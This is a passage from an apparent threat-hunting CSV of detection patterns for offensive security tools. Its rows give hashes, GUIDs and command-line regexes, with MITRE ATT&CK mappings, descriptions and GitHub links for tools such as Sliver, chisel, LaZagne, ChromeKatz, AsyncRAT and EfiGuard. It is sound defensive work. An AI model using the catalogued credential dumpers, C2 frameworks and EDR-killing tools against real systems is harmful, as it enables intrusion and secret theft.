tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*0c3379e3cc4fab5cbf1ce0aff52559da191a2b97c6fa27d5122232649f78e7cc*",".{0,1000}0c3379e3cc4fab5cbf1ce0aff52559da191a2b97c6fa27d5122232649f78e7cc.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","0","file_hash","10","10","472","59","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" "*0c64315cdf7bd0e51e76f04510c91d931b8b4de73f06ea7931666e62cb34739f*",".{0,1000}0c64315cdf7bd0e51e76f04510c91d931b8b4de73f06ea7931666e62cb34739f.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*0c649fe30b4986eff17b3913a02a89728126d530298659f1fe1ea07570428c2b*",".{0,1000}0c649fe30b4986eff17b3913a02a89728126d530298659f1fe1ea07570428c2b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*0c7fdc11cd301457131335dc023726493d839cd18ab659c9ab3a53fbe24269c1*",".{0,1000}0c7fdc11cd301457131335dc023726493d839cd18ab659c9ab3a53fbe24269c1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*0C81C7D4-736A-4876-A36E-15E5B2EF5117*",".{0,1000}0C81C7D4\-736A\-4876\-A36E\-15E5B2EF5117.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*0C89EC7D-AC60-4591-8F6B-CB5F20EC0D8D*",".{0,1000}0C89EC7D\-AC60\-4591\-8F6B\-CB5F20EC0D8D.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*0c8e33156886e733d0021652fe0a13b03946fc09adb392458fb2a435fb402d85*",".{0,1000}0c8e33156886e733d0021652fe0a13b03946fc09adb392458fb2a435fb402d85.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*0C8F49D8-BD68-420A-907D-031B83737C50*",".{0,1000}0C8F49D8\-BD68\-420A\-907D\-031B83737C50.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*0ca10134908aead6310e72aae31b7eca8e653ccfa9a2bad686cea277367e4f83*",".{0,1000}0ca10134908aead6310e72aae31b7eca8e653ccfa9a2bad686cea277367e4f83.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*0cb5af2ee5239ef9d399446af3088fd26fff2e012b9f8b7e7e59569c8d7d6369*",".{0,1000}0cb5af2ee5239ef9d399446af3088fd26fff2e012b9f8b7e7e59569c8d7d6369.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*0cb85b94cf22a5eb8c6a391c9546aeeb1d86b7e7ae482b512de0f45c3ed90f26*",".{0,1000}0cb85b94cf22a5eb8c6a391c9546aeeb1d86b7e7ae482b512de0f45c3ed90f26.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*0cd6b6f2c8164d440a118eb546a05d54232cedd792b4e5998cd653a5f3921a40*",".{0,1000}0cd6b6f2c8164d440a118eb546a05d54232cedd792b4e5998cd653a5f3921a40.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*0cf8787b1bfb746c629b92dc5a471a436105e176d306a2808a636adab4df1508*",".{0,1000}0cf8787b1bfb746c629b92dc5a471a436105e176d306a2808a636adab4df1508.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*0cffe83538d449fae070161c557a89aad53f47d7472eb22c2cfc3c2671852fa6*",".{0,1000}0cffe83538d449fae070161c557a89aad53f47d7472eb22c2cfc3c2671852fa6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*0d1448c1bc3c43a7a989e251079fcd0bea32cb8864b4b00cb8c17310464fd06d*",".{0,1000}0d1448c1bc3c43a7a989e251079fcd0bea32cb8864b4b00cb8c17310464fd06d.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*0D17A4B4-A7C4-49C0-99E3-B856F9F3B271*",".{0,1000}0D17A4B4\-A7C4\-49C0\-99E3\-B856F9F3B271.{0,1000}","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","0","N/A","10","4","345","63","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" "*0d1a410e8085517a23da9fee226564169f767570993dcbb8f0b81b579a50e541*",".{0,1000}0d1a410e8085517a23da9fee226564169f767570993dcbb8f0b81b579a50e541.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*0d1n * --post * --payloads *",".{0,1000}0d1n\s.{0,1000}\s\-\-post\s.{0,1000}\s\-\-payloads\s.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*0d1n --host*",".{0,1000}0d1n\s\-\-host.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*0d1n*kill_listener.sh*",".{0,1000}0d1n.{0,1000}kill_listener\.sh.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*0d33356f9addc458bf9fc3861d9cafef954a51b66412b1cfc435eede351733f1*",".{0,1000}0d33356f9addc458bf9fc3861d9cafef954a51b66412b1cfc435eede351733f1.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","0","N/A","10","1","56","3","2024-04-19T17:11:22Z","2024-03-05T00:00:20Z" "*0d6730ca52c1a887006e318a677aa70ed059c67c4bb82af56fec792b2a72e1c9*",".{0,1000}0d6730ca52c1a887006e318a677aa70ed059c67c4bb82af56fec792b2a72e1c9.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*0dayCTF/reverse-shell-generator*",".{0,1000}0dayCTF\/reverse\-shell\-generator.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*0dbce336ba4f98f26b89fc110bee0b43aed24002c2fba5df9a7675d168aad12d*",".{0,1000}0dbce336ba4f98f26b89fc110bee0b43aed24002c2fba5df9a7675d168aad12d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*0DD419E5-D7B3-4360-874E-5838A7519355*",".{0,1000}0DD419E5\-D7B3\-4360\-874E\-5838A7519355.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","669","140","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*0de61f6d712f44fd8337794c3d933d3e0de24bae9235383904541997c604b47a*",".{0,1000}0de61f6d712f44fd8337794c3d933d3e0de24bae9235383904541997c604b47a.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","N/A","9","6","516","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z" "*0DE8DA5D-061D-4649-8A56-48729CF1F789*",".{0,1000}0DE8DA5D\-061D\-4649\-8A56\-48729CF1F789.{0,1000}","offensive_tool_keyword","AsyncRAT-C-Sharp","Open-Source Remote Administration Tool For Windows C# (RAT)","T1021.002 - T1056.001 - T1113 - T1133 - T1041 - T1555 - T1129 - T1564.001","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp","1","0","N/A","10","10","2110","708","2023-10-16T21:41:12Z","2019-01-19T04:02:26Z" "*0DF38AD4-60AF-4F93-9C7A-7FB7BA692017*",".{0,1000}0DF38AD4\-60AF\-4F93\-9C7A\-7FB7BA692017.{0,1000}","offensive_tool_keyword","Volumiser","Volumiser is a command line tool and interactive console GUI for listing - browsing and extracting files from common virtual machine hard disk image formats.","T1560.001 - T1059 - T1114 - T1005","TA0005 - TA0009","N/A","N/A","Collection","https://github.com/CCob/Volumiser","1","0","N/A","7","4","318","34","2023-05-05T14:03:14Z","2022-11-08T21:38:56Z" "*0DF612AE-47D8-422C-B0C5-0727EA60784F*",".{0,1000}0DF612AE\-47D8\-422C\-B0C5\-0727EA60784F.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","N/A","10","3","223","31","2024-04-27T15:37:50Z","2024-02-22T15:16:16Z" "*0dfd57cb8299edf2e4a941d39ba787960de83f00b57c4f885bb141782a3b559b*",".{0,1000}0dfd57cb8299edf2e4a941d39ba787960de83f00b57c4f885bb141782a3b559b.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*0e26255b8db0b2e2792225febc5d3adeebc02edff523e90156c76b5baf7ee9b3*",".{0,1000}0e26255b8db0b2e2792225febc5d3adeebc02edff523e90156c76b5baf7ee9b3.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*0e2e76930ff8d2bea66b82db863243f3895d39e761893eb6de025325747774b6*",".{0,1000}0e2e76930ff8d2bea66b82db863243f3895d39e761893eb6de025325747774b6.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*0e34604b09472922b088573ae7b8a2686982b05900251f861912e3d9d2760980*",".{0,1000}0e34604b09472922b088573ae7b8a2686982b05900251f861912e3d9d2760980.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*0e3e7f92c7f8f10535a6a15079813e2b8a3f5e4cfc00a275d2a2e917539306d2*",".{0,1000}0e3e7f92c7f8f10535a6a15079813e2b8a3f5e4cfc00a275d2a2e917539306d2.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*0E4BAB8F-E6E0-47A8-8E99-8D451839967E*",".{0,1000}0E4BAB8F\-E6E0\-47A8\-8E99\-8D451839967E.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","N/A","10","10","1626","323","2024-01-21T06:45:07Z","2019-03-25T19:47:39Z" "*0e5ae252e2597d44f6e8def9fcdd3562954130a0261776e083959d067795c450*",".{0,1000}0e5ae252e2597d44f6e8def9fcdd3562954130a0261776e083959d067795c450.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","0","N/A","10","3","212","43","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z" "*0e643bd5e3eaf43f5eee053904a24dac9bf05150885fcb32a606ef3ee1c7db1f*",".{0,1000}0e643bd5e3eaf43f5eee053904a24dac9bf05150885fcb32a606ef3ee1c7db1f.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*0e744d477bb40e89af274ecf70c339b9674699e4bfe984b5dd73a2b877369d48*",".{0,1000}0e744d477bb40e89af274ecf70c339b9674699e4bfe984b5dd73a2b877369d48.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*0e8dfd9cc5fcd99e4ee93d4c015e49dd672ac1813c0270c4ff3ed8c1b9db85d1*",".{0,1000}0e8dfd9cc5fcd99e4ee93d4c015e49dd672ac1813c0270c4ff3ed8c1b9db85d1.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*0ea533dd75837182416f5ffa7f51a36d82c407587068d0404c177f18709ffa63*",".{0,1000}0ea533dd75837182416f5ffa7f51a36d82c407587068d0404c177f18709ffa63.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*0ebce776a2758cb99ecc9a6ba97fc432e40925fbe1a4e068bbc7a273f6064269*",".{0,1000}0ebce776a2758cb99ecc9a6ba97fc432e40925fbe1a4e068bbc7a273f6064269.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*0ec459ed281c0ee777046a0a31b59500843a74f776a459a12438d6412f146001*",".{0,1000}0ec459ed281c0ee777046a0a31b59500843a74f776a459a12438d6412f146001.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*0ecd88de5d2728034f25bc04fcf9553198453fb46bbb93a00a74e6e74747435b*",".{0,1000}0ecd88de5d2728034f25bc04fcf9553198453fb46bbb93a00a74e6e74747435b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*0ed7071221412e55b8fa13a88d21ef523186e621acfb3cf3fe0dd292c0a25951*",".{0,1000}0ed7071221412e55b8fa13a88d21ef523186e621acfb3cf3fe0dd292c0a25951.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*0ed8c3f90c77356f7d02574491f66586b96552efd0b6ef53d7de263893061bc5*",".{0,1000}0ed8c3f90c77356f7d02574491f66586b96552efd0b6ef53d7de263893061bc5.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*0evilpwfilter*",".{0,1000}0evilpwfilter.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*0evilpwfilter.dll*",".{0,1000}0evilpwfilter\.dll.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*0evilpwfilter.dll*",".{0,1000}0evilpwfilter\.dll.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*0f0840b7da6f223c52f15ae1793c5a2942ce0d09ff493967b497a5d839eaaaa5*",".{0,1000}0f0840b7da6f223c52f15ae1793c5a2942ce0d09ff493967b497a5d839eaaaa5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation 